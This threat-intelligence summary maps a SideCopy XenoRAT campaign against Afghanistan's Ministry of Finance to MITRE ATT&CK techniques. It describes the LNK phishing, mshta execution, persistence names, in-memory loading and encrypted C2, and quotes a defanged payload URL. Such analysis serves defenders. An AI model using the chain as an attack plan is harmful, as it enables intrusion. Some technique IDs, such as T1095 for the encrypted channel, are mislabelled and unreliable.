Operation XENOFISCAL: SideCopy deploying persistent XenoRAT targeting the MoF, Afghanistan

MITRE Techniques

• [T1566.001] Spearphishing Attachment – The campaign began with a ZIP archive delivered through phishing, containing the malicious LNK attachment (‘a ZIP archive containing a malicious LNK file’).
• [T1218.005] Trusted Developer Utilities Proxy Execution: mshta – The LNK launched mshta.exe to fetch and run remote content (‘it launches the Windows utility mshta.exe’).
• [T1059.003] Command and Scripting Interpreter: Windows Command Shell – The malware used cmd.exe to execute commands, start payloads, and register persistence (‘runs cmd.exe /c start … and executes the specified file or command’).
• [T1059.007] Command and Scripting Interpreter: JavaScript – The HTA stage contained heavily obfuscated JavaScript used to decode and execute malicious logic (‘heavily obfuscated JavaScript code designed to execute malicious logic’).
• [T1547.001] Registry Run Keys / Startup Folder – Persistence was created through HKCU Run keys, including an entry named Edgre (‘creates a new entry under the HKCU…Run registry key’).
• [T1053.005] Scheduled Task – The malware also created a scheduled task named XenoUpdateManager for admin-level startup persistence (‘creates a Windows Scheduled Task named “XenoUpdateManager”’).
• [T1027] Obfuscated Files or Information – Multiple stages used obfuscation, encoded strings, and hidden commands to hinder analysis (‘heavily obfuscated JavaScript’, ‘Base64-encoded registry commands’).
• [T1140] Deobfuscate/Decode Files or Information – The loader decoded Base64 content, decompressed payloads, and reconstructed executables in memory (‘custom Base64 decoding routine’, ‘GZip decompression’).
• [T1106] Native API – The shellcode loader used Windows APIs such as VirtualAlloc, CreateThread, and WaitForSingleObject (‘allocates executable memory’, ‘transfers execution’).
• [T1027.011] Embedded Payloads / Reflective Code Loading – The payload was reconstructed and executed from memory using .NET deserialization and in-memory loading (‘BinaryFormatter.Deserialize_2()’, ‘Assembly.Load(byte[])’).
• [T1129] Shared Modules – The infection chain loaded and invoked external DLL modules dynamically from memory (‘loads it dynamically using Assembly.Load’).
• [T1070.004] File Deletion – The uninstaller removed itself from disk after cleanup (‘Del’, ‘self-terminates the program’).
• [T1012] Query Registry – The malware queried registry paths to detect .NET versions and manage startup entries (‘querying the registry path HKLMSOFTWAREMicrosoft.NETFramework…’).
• [T1518] Software Discovery – The malware checked for installed antivirus products via WMI (‘GetAntivirus function retrieves antivirus information’).
• [T1095] Non-Application Layer Protocol – XenoRAT used TCP-based C2 communication (‘establishing a TCP-based command-and-control connection’).
• [T1071.001] Application Layer Protocol: Web Protocols – The loader fetched payloads over HTTPS from web resources (‘downloaded the encoded payload from hxxps://abimj.edu.af/…’).
• [T1090.002] Proxy: External Proxy – The RAT used SOCKS5 proxy-based tunneling (‘Supports SOCKS5 proxy-based network tunneling’).
• [T1095] Encrypted Channel – Communication was encrypted with AES and a shared key (‘data security is enforced using AES encryption’).
• [T1568] Dynamic Resolution – The malware selected different payload endpoints based on OS version (‘dynamically selects the download endpoint based on the victim operating system version’).